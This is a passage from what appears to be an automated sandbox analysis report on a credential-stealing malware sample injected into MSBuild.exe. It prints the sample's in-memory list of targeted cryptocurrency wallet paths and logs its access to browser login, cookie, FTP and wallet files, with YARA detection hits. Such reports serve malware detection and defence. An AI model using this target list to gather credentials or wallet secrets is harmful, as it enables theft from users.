Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC90C40 sqlite3_bind_zeroblob, 1_2_6CC90C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC90D60 sqlite3_bind_parameter_name, 1_2_6CC90D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB8EA0 sqlite3_clear_bindings, 1_2_6CBB8EA0